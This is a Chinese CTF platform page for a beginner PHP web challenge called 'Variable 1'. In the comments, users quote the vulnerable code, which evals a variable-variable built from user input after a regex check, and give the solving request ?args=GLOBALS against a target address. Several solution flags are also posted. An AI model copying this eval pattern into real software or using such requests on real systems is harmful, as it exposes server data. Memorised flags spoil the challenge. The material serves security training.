变量1WEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 16764
提  示:
描  述:
题目变量1
评论
zhenbuhuiweb 1年前

flag{ee9e3e18e2faf083d243daf9819bccb9}

回复 0

3166235571 1年前

if(!preg_match("/^\w+$/",$args)){ // 正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小写字母和0到9以及下划线组成 die("args error!"); } eval("var_dump($$args);

回复 1

哥哥 1年前

http://114.67.175.224:18582/?args=GLOBALS flag{60729e319d957a46aa93c8297eea6108}

回复 0

EtHat 1年前

/?args=_SERVER

回复 0

鸡你太美 1年前

使用?args=GLOBALS以字典类型返回当前位置的全部全局变量。 得到flag{c94e74f9465ed5564d0f1047b3da021c}

回复 2
jamin 1年前

@asd+1024 GLOBAL会被正则表达式匹配,但是正则匹配前面还有"!",取反了,所以if不执行

回复 1

ts4win 1年前

@LP_joker + 表示匹配前面的模式一次或多次,并不是加上数字

回复 0

LP_joker 1年前

@asd+1024 ^\w+$表示匹配“大小写字母+数字” GLOSBALS只有字母

回复 0

asd+1024 1年前

可是,为什么GLOBAL不会被正则表达式匹配啊,大佬能讲讲吗

回复 0

coo1an 1年前

/?args=GLOBALS

回复 0

大哥大 1年前

?args=GLOBALS即可得到flag

回复 1

chushou 2年前

了解 preg_match()函数,预变量GLOBALS。让参数args=GLOBALS就可以得到flag

回复 2

movieatravelover 2年前

flag{ea4e336dbeb0a5cf5400ee29f2ca93fc}

回复 0

107zsm 2年前

靶机地址+?args=GLOBALS即可得到flag

回复 2

WriteUp

image
harry

1 金币

评分(14)

解题动态

liang52kr 攻破了该题 1小时前
3079499773 攻破了该题 2小时前
牧之雪夜 攻破了该题 2小时前
15891957214 攻破了该题 5小时前
blii 攻破了该题 5小时前
wz666 攻破了该题 5小时前
皮蛋瘦肉粥 攻破了该题 6小时前
zhugq 攻破了该题 8小时前
tanAlger 攻破了该题 10小时前
18354096589 攻破了该题 10小时前
FutureWC 攻破了该题 13小时前
lovelhp 攻破了该题 13小时前
16699311680 攻破了该题 13小时前
aijuner 攻破了该题 15小时前
18253937182 攻破了该题 1天前
batflymejusthunt 攻破了该题 1天前
suyifeim4 攻破了该题 1天前
782344536 攻破了该题 1天前
13340797087 攻破了该题 1天前
touchcandy 攻破了该题 1天前
问题反馈